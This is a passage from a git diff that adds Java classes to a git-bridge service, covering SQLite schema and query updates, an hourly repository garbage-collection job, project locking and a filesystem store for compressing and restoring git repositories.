uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class ProjectsAddRestoreTime implements SQLUpdate { + private static final String PROJECTS_ADD_RESTORE_TIME = + "ALTER TABLE `projects`\n" + "ADD COLUMN `restore_time` DATETIME NULL;\n"; + + @Override + public String getSQL() { + return PROJECTS_ADD_RESTORE_TIME; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapCompression.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapCompression.java new file mode 100644 index 0000000..25ec930 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapCompression.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class ProjectsAddSwapCompression implements SQLUpdate { + private static final String PROJECTS_ADD_SWAP_COMPRESSION = + "ALTER TABLE `projects`\n" + "ADD COLUMN `swap_compression` VARCHAR NULL;\n"; + + @Override + public String getSQL() { + return PROJECTS_ADD_SWAP_COMPRESSION; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapTime.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapTime.java new file mode 100644 index 0000000..e578dc0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapTime.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class ProjectsAddSwapTime implements SQLUpdate { + private static final String PROJECTS_ADD_SWAP_TIME = + "ALTER TABLE `projects`\n" + "ADD COLUMN `swap_time` DATETIME NULL;\n"; + + @Override + public String getSQL() { + return PROJECTS_ADD_SWAP_TIME; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/SetSoftHeapLimitPragma.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/SetSoftHeapLimitPragma.java new file mode 100644 index 0000000..0f8d935 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/SetSoftHeapLimitPragma.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class SetSoftHeapLimitPragma implements SQLUpdate { + private int heapLimitBytes = 0; + + public SetSoftHeapLimitPragma(int heapLimitBytes) { + this.heapLimitBytes = heapLimitBytes; + } + + @Override + public String getSQL() { + return "PRAGMA soft_heap_limit=" + this.heapLimitBytes + ";"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateIndexURLIndexStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateIndexURLIndexStore.java new file mode 100644 index 0000000..a408422 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateIndexURLIndexStore.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 21/02/15. + */ +public class CreateIndexURLIndexStore implements SQLUpdate { + + public static final String CREATE_INDEX_URL_INDEX_STORE = + "CREATE UNIQUE INDEX IF NOT EXISTS `project_path_index` " + + "ON `url_index_store`(`project_name`, `path`);\n"; + + @Override + public String getSQL() { + return CREATE_INDEX_URL_INDEX_STORE; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsIndexLastAccessed.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsIndexLastAccessed.java new file mode 100644 index 0000000..f937fa3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsIndexLastAccessed.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by winston on 23/08/2016. + */ +public class CreateProjectsIndexLastAccessed implements SQLUpdate { + + private static final String CREATE_PROJECTS_INDEX_LAST_ACCESSED = + "CREATE INDEX IF NOT EXISTS `projects_index_last_accessed`\n" + + " ON `projects`(`last_accessed`)"; + + @Override + public String getSQL() { + return CREATE_PROJECTS_INDEX_LAST_ACCESSED; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsTableSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsTableSQLUpdate.java new file mode 100644 index 0000000..1e7910c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsTableSQLUpdate.java @@ -0,0 +1,25 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. + */ +public class CreateProjectsTableSQLUpdate implements SQLUpdate { + + private static final String CREATE_PROJECTS_TABLE = + "CREATE TABLE IF NOT EXISTS `projects` (\n" + + " `name` VARCHAR NOT NULL DEFAULT '',\n" + + " `version_id` INT NOT NULL DEFAULT 0,\n" + + " `last_accessed` DATETIME NULL DEFAULT 0,\n" + + " `swap_time` DATETIME NULL,\n" + + " `restore_time` DATETIME NULL,\n" + + " `swap_compression` VARCHAR NULL,\n" + + " PRIMARY KEY (`name`)\n" + + ")"; + + @Override + public String getSQL() { + return CREATE_PROJECTS_TABLE; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateURLIndexStoreSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateURLIndexStoreSQLUpdate.java new file mode 100644 index 0000000..1274eb0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateURLIndexStoreSQLUpdate.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. + */ +public class CreateURLIndexStoreSQLUpdate implements SQLUpdate { + + private static final String CREATE_URL_INDEX_STORE = + "CREATE TABLE IF NOT EXISTS `url_index_store` (\n" + + " `project_name` varchar(10) NOT NULL DEFAULT '',\n" + + " `url` text NOT NULL,\n" + + " `path` text NOT NULL,\n" + + " PRIMARY KEY (`project_name`,`url`),\n" + + " CONSTRAINT `url_index_store_ibfk_1` " + + "FOREIGN KEY (`project_name`) " + + "REFERENCES `projects` (`name`) " + + "ON DELETE CASCADE " + + "ON UPDATE CASCADE\n" + + ");\n"; + + @Override + public String getSQL() { + return CREATE_URL_INDEX_STORE; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteAllFilesInProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteAllFilesInProjectSQLUpdate.java new file mode 100644 index 0000000..a23a468 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteAllFilesInProjectSQLUpdate.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class DeleteAllFilesInProjectSQLUpdate implements SQLUpdate { + private final String projectName; + + public DeleteAllFilesInProjectSQLUpdate(String projectName) { + this.projectName = projectName; + } + + @Override + public String getSQL() { + return "DELETE FROM `url_index_store` WHERE `project_name` = ?"; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdate.java new file mode 100644 index 0000000..5c3527a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdate.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. + */ +public class DeleteFilesForProjectSQLUpdate implements SQLUpdate { + + private static final String DELETE_URL_INDEXES_FOR_PROJECT_NAME = + "DELETE FROM `url_index_store` " + "WHERE `project_name` = ? AND path IN ("; + + private final String projectName; + private final String[] paths; + + public DeleteFilesForProjectSQLUpdate(String projectName, String... paths) { + this.projectName = projectName; + this.paths = paths; + } + + @Override + public String getSQL() { + StringBuilder sb = new StringBuilder(DELETE_URL_INDEXES_FOR_PROJECT_NAME); + for (int i = 0; i < paths.length; i++) { + sb.append("?"); + if (i < paths.length - 1) { + sb.append(", "); + } + } + sb.append(");\n"); + return sb.toString(); + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + for (int i = 0; i < paths.length; i++) { + statement.setString(i + 2, paths[i]); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteProjectSQLUpdate.java new file mode 100644 index 0000000..ff989e1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteProjectSQLUpdate.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class DeleteProjectSQLUpdate implements SQLUpdate { + private final String projectName; + + public DeleteProjectSQLUpdate(String projectName) { + this.projectName = projectName; + } + + @Override + public String getSQL() { + return "DELETE FROM `projects` WHERE `name` = ?"; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/AddURLIndexSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/AddURLIndexSQLUpdate.java new file mode 100644 index 0000000..a79ea6d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/AddURLIndexSQLUpdate.java @@ -0,0 +1,41 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. + */ +public class AddURLIndexSQLUpdate implements SQLUpdate { + + private static final String ADD_URL_INDEX = + "INSERT OR REPLACE INTO `url_index_store`(" + + "`project_name`, " + + "`url`, " + + "`path`" + + ") VALUES " + + "(?, ?, ?)\n"; + + private final String projectName; + private final String url; + private final String path; + + public AddURLIndexSQLUpdate(String projectName, String url, String path) { + this.projectName = projectName; + this.url = url; + this.path = path; + } + + @Override + public String getSQL() { + return ADD_URL_INDEX; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + statement.setString(2, url); + statement.setString(3, path); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectLastAccessedTime.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectLastAccessedTime.java new file mode 100644 index 0000000..945f398 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectLastAccessedTime.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.sql.Timestamp; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by winston on 23/08/2016. + */ +public class SetProjectLastAccessedTime implements SQLUpdate { + + private static final String SET_PROJECT_LAST_ACCESSED_TIME = + "UPDATE `projects`\n" + "SET `last_accessed` = ?\n" + "WHERE `name` = ?"; + + private final String projectName; + private final Timestamp lastAccessed; + + public SetProjectLastAccessedTime(String projectName, Timestamp lastAccessed) { + this.projectName = projectName; + this.lastAccessed = lastAccessed; + } + + @Override + public String getSQL() { + return SET_PROJECT_LAST_ACCESSED_TIME; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setTimestamp(1, lastAccessed); + statement.setString(2, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectSQLUpdate.java new file mode 100644 index 0000000..7c472e0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectSQLUpdate.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. + */ +public class SetProjectSQLUpdate implements SQLUpdate { + + private static final String SET_PROJECT = + "INSERT OR REPLACE " + + "INTO `projects`(`name`, `version_id`, `last_accessed`) " + + "VALUES (?, ?, DATETIME('now'));\n"; + + private final String projectName; + private final int versionID; + + public SetProjectSQLUpdate(String projectName, int versionID) { + this.projectName = projectName; + this.versionID = versionID; + } + + @Override + public String getSQL() { + return SET_PROJECT; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + statement.setInt(2, versionID); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateRestore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateRestore.java new file mode 100644 index 0000000..bb76748 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateRestore.java @@ -0,0 +1,37 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class UpdateRestore implements SQLUpdate { + private static final String UPDATE_RESTORE = + "UPDATE `projects`\n" + + "SET `last_accessed` = ?,\n" + + " `swap_time` = NULL,\n" + + " `restore_time` = ?,\n" + + " `swap_compression` = NULL\n" + + "WHERE `name` = ?;\n"; + + private final String projectName; + private final Timestamp now; + + public UpdateRestore(String projectName) { + this.projectName = projectName; + this.now = Timestamp.valueOf(LocalDateTime.now()); + } + + @Override + public String getSQL() { + return UPDATE_RESTORE; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setTimestamp(1, now); + statement.setTimestamp(2, now); + statement.setString(3, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateSwap.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateSwap.java new file mode 100644 index 0000000..df09ddc --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateSwap.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class UpdateSwap implements SQLUpdate { + private static final String UPDATE_SWAP = + "UPDATE `projects`\n" + + "SET `last_accessed` = NULL,\n" + + " `swap_time` = ?,\n" + + " `restore_time` = NULL,\n" + + " `swap_compression` = ?\n" + + "WHERE `name` = ?;\n"; + + private final String projectName; + private final String compression; + private final Timestamp now; + + public UpdateSwap(String projectName, String compression) { + this.projectName = projectName; + this.compression = compression; + this.now = Timestamp.valueOf(LocalDateTime.now()); + } + + @Override + public String getSQL() { + return UPDATE_SWAP; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setTimestamp(1, now); + statement.setString(2, compression); + statement.setString(3, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJob.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJob.java new file mode 100644 index 0000000..60edc7a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJob.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.bridge.gc; + +import java.util.concurrent.CompletableFuture; + +/* + * Is started by the bridge. Every time a project is updated, we queue it for + * GC which executes every hour or so. + * + * We don't queue it into a more immediate Executor because there is no way to + * know if a call to {@link Bridge#updateProject(Optional, ProjectRepo)}, + * which releases the lock, is going to call + * {@link Bridge#push(Optional, String, RawDirectory, RawDirectory, String)}. + * + * We don't want the GC to run in between an update and a push. + */ +public interface GcJob { + + void start(); + + void stop(); + + void onPreGc(Runnable preGc); + + void onPostGc(Runnable postGc); + + void queueForGc(String projectName); + + CompletableFuture<Void> waitForRun(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImpl.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImpl.java new file mode 100644 index 0000000..6ccf1dd --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImpl.java @@ -0,0 +1,130 @@ +package uk.ac.ic.wlgitbridge.bridge.gc; + +import java.io.IOException; +import java.util.*; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.atomic.AtomicReference; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantLock; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.TimerUtils; + +/* + * Implementation of {@link GcJob} using its own Timer and a synchronized + * queue. + */ +public class GcJobImpl implements GcJob { + + private final RepoStore repoStore; + private final ProjectLock locks; + + private final long intervalMs; + private final Timer timer; + + private final Set<String> gcQueue; + + /* + * Hooks in case they are needed, e.g. for testing. + */ + private AtomicReference<Runnable> preGc; + private AtomicReference<Runnable> postGc; + + /* We need to iterate over and empty it after every run */ + private final Lock jobWaitersLock; + private final List<CompletableFuture<Void>> jobWaiters; + + public GcJobImpl(RepoStore repoStore, ProjectLock locks, long intervalMs) { + this.repoStore = repoStore; + this.locks = locks; + this.intervalMs = intervalMs; + timer = new Timer(); + gcQueue = Collections.newSetFromMap(new ConcurrentHashMap<>()); + preGc = new AtomicReference<>(() -> {}); + postGc = new AtomicReference<>(() -> {}); + jobWaitersLock = new ReentrantLock(); + jobWaiters = new ArrayList<>(); + } + + public GcJobImpl(RepoStore repoStore, ProjectLock locks) { + this(repoStore, locks, TimeUnit.MILLISECONDS.convert(1, TimeUnit.HOURS)); + } + + @Override + public void start() { + Log.info("Starting GC job to run every [{}] ms", intervalMs); + timer.scheduleAtFixedRate(TimerUtils.makeTimerTask(this::doGC), intervalMs, intervalMs); + } + + @Override + public void stop() { + Log.info("Stopping GC job"); + timer.cancel(); + } + + @Override + public void onPreGc(Runnable preGc) { + this.preGc.set(preGc); + } + + @Override + public void onPostGc(Runnable postGc) { + this.postGc.set(postGc); + } + + /* + * Needs to be callable from any thread. + * @param projectName + */ + @Override + public void queueForGc(String projectName) { + gcQueue.add(projectName); + } + + @Override + public CompletableFuture<Void> waitForRun() { + CompletableFuture<Void> ret = new CompletableFuture<>(); + jobWaitersLock.lock(); + try { + jobWaiters.add(ret); + } finally { + jobWaitersLock.unlock(); + } + return ret; + } + + private void doGC() { + Log.info("GC job running"); + int numGcs = 0; + preGc.get().run(); + for (Iterator<String> it = gcQueue.iterator(); it.hasNext(); it.remove(), ++numGcs) { + String proj = it.next(); + Log.debug("[{}] Running GC job on project", proj); + try (LockGuard __ = locks.lockGuard(proj)) { + try { + ProjectRepo repo = repoStore.getExistingRepo(proj); + repo.runGC(); + repo.deleteIncomingPacks(); + } catch (IOException e) { + Log.warn("[{}] Failed to GC project", proj); + } + } catch (CannotAcquireLockException e) { + Log.warn("[{}] Cannot acquire project lock, skipping GC", proj); + } + } + Log.info("GC job finished, num gcs: {}", numGcs); + jobWaitersLock.lock(); + try { + jobWaiters.forEach(w -> w.complete(null)); + } finally { + jobWaitersLock.unlock(); + } + postGc.get().run(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/LockGuard.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/LockGuard.java new file mode 100644 index 0000000..9fc761a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/LockGuard.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.bridge.lock; + +/* + * Created by winston on 24/08/2016. + */ +public interface LockGuard extends AutoCloseable { + + void close(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/ProjectLock.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/ProjectLock.java new file mode 100644 index 0000000..e23c23c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/lock/ProjectLock.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.lock; + +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; + +/* + * Project Lock class. + * + * The locks should be re-entrant. For example, we are usually holding the lock + * when a project must be restored, which tries to acquire the lock again. + */ +public interface ProjectLock { + + void lockAll(); + + void lockForProject(String projectName) throws CannotAcquireLockException; + + void unlockForProject(String projectName); + + /* RAII hahaha */ + default LockGuard lockGuard(String projectName) throws CannotAcquireLockException { + lockForProject(projectName); + return () -> unlockForProject(projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStore.java new file mode 100644 index 0000000..d774f30 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStore.java @@ -0,0 +1,164 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import static uk.ac.ic.wlgitbridge.util.Util.deleteInDirectoryApartFrom; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.io.InputStream; +import java.nio.file.Paths; +import java.util.ArrayList; +import java.util.Collection; +import java.util.List; +import java.util.Optional; +import java.util.function.Function; +import org.apache.commons.io.FileUtils; +import org.eclipse.jgit.lib.ObjectId; +import org.eclipse.jgit.lib.Repository; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Project; +import uk.ac.ic.wlgitbridge.util.Tar; + +/* + * Created by winston on 20/08/2016. + */ +public class FSGitRepoStore implements RepoStore { + + private static final long DEFAULT_MAX_FILE_SIZE = 50 * 1024 * 1024; + + private final String repoStorePath; + + private final File rootDirectory; + + private final long maxFileSize; + + private final Function<File, Long> fsSizer; + + public FSGitRepoStore(String repoStorePath, Optional<Long> maxFileSize) { + this( + repoStorePath, + maxFileSize.orElse(DEFAULT_MAX_FILE_SIZE), + d -> d.getTotalSpace() - d.getFreeSpace()); + } + + public FSGitRepoStore(String repoStorePath, long maxFileSize, Function<File, Long> fsSizer) { + this.repoStorePath = repoStorePath; + rootDirectory = initRootGitDirectory(repoStorePath); + this.maxFileSize = maxFileSize; + this.fsSizer = fsSizer; + } + + @Override + public String getRepoStorePath() { + return repoStorePath; + } + + @Override + public File getRootDirectory() { + return rootDirectory; + } + + @Override + public ProjectRepo initRepo(String project) throws IOException { + GitProjectRepo ret = GitProjectRepo.fromName(project); + ret.initRepo(this); + return new WalkOverrideGitRepo(ret, Optional.of(maxFileSize), Optional.empty()); + } + + @Override + public ProjectRepo getExistingRepo(String project) throws IOException { + GitProjectRepo ret = GitProjectRepo.fromName(project); + ret.useExistingRepository(this); + return new WalkOverrideGitRepo(ret, Optional.of(maxFileSize), Optional.empty()); + } + + @Override + public ProjectRepo useJGitRepo(Repository repo, ObjectId commitId) { + GitProjectRepo ret = GitProjectRepo.fromJGitRepo(repo); + return new WalkOverrideGitRepo(ret, Optional.of(maxFileSize), Optional.of(commitId)); + } + + /* TODO: Perhaps we should just delete bad directories on the fly. */ + @Override + public void purgeNonexistentProjects(Collection<String> existingProjectNames) { + List<String> excludedFromDeletion = new ArrayList<>(existingProjectNames); + excludedFromDeletion.add(".wlgb"); + deleteInDirectoryApartFrom(rootDirectory, excludedFromDeletion.toArray(new String[] {})); + } + + @Override + public long totalSize() { + return fsSizer.apply(rootDirectory); + } + + @Override + public InputStream bzip2Project(String projectName, long[] sizePtr) throws IOException { + Project.checkValidProjectName(projectName); + Log.debug("[{}] bzip2 project", projectName); + return Tar.bz2.zip(getDotGitForProject(projectName), sizePtr); + } + + @Override + public InputStream gzipProject(String projectName, long[] sizePtr) throws IOException { + Project.checkValidProjectName(projectName); + Log.debug("[{}] gzip project", projectName); + return Tar.gzip.zip(getDotGitForProject(projectName), sizePtr); + } + + @Override + public void gcProject(String projectName) throws IOException { + Project.checkValidProjectName(projectName); + ProjectRepo repo = getExistingRepo(projectName); + repo.runGC(); + } + + @Override + public void remove(String projectName) throws IOException { + Project.checkValidProjectName(projectName); + FileUtils.deleteDirectory(new File(rootDirectory, projectName)); + } + + @Override + public void unbzip2Project(String projectName, InputStream dataStream) throws IOException { + Preconditions.checkArgument( + Project.isValidProjectName(projectName), "[%s] invalid project name: ", projectName); + Preconditions.checkState( + getDirForProject(projectName).mkdirs(), + "[%s] directories for " + "evicted project already exist", + projectName); + Log.debug("[{}] un-bzip2 project", projectName); + Tar.bz2.unzip(dataStream, getDirForProject(projectName)); + } + + @Override + public void ungzipProject(String projectName, InputStream dataStream) throws IOException { + Preconditions.checkArgument( + Project.isValidProjectName(projectName), "[%s] invalid project name: ", projectName); + Preconditions.checkState( + getDirForProject(projectName).mkdirs(), + "[%s] directories for " + "evicted project already exist", + projectName); + Log.debug("[{}] un-gzip project", projectName); + Tar.gzip.unzip(dataStream, getDirForProject(projectName)); + } + + private File getDirForProject(String projectName) { + Project.checkValidProjectName(projectName); + return Paths.get(rootDirectory.getAbsolutePath()).resolve(projectName).toFile(); + } + + private File getDotGitForProject(String projectName) { + Project.checkValidProjectName(projectName); + return Paths.get(rootDirectory.getAbsolutePath()).resolve(projectName).resolve(".git").toFile(); + } + + private File initRootGitDirectory(String rootGitDirectoryPath) { + File rootGitDirectory = new File(rootGitDirectoryPath); + rootGitDirectory.mkdirs(); + Preconditions.checkArgument( + rootGitDirectory.isDirectory(), + "given root git directory " + "is not a directory: %s", + rootGitDirectory.getAbsolutePath()); + return rootGitDirectory; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepo.java new file mode 100644 index 0000000..86754f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepo.java @@ -0,0 +1,231 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import 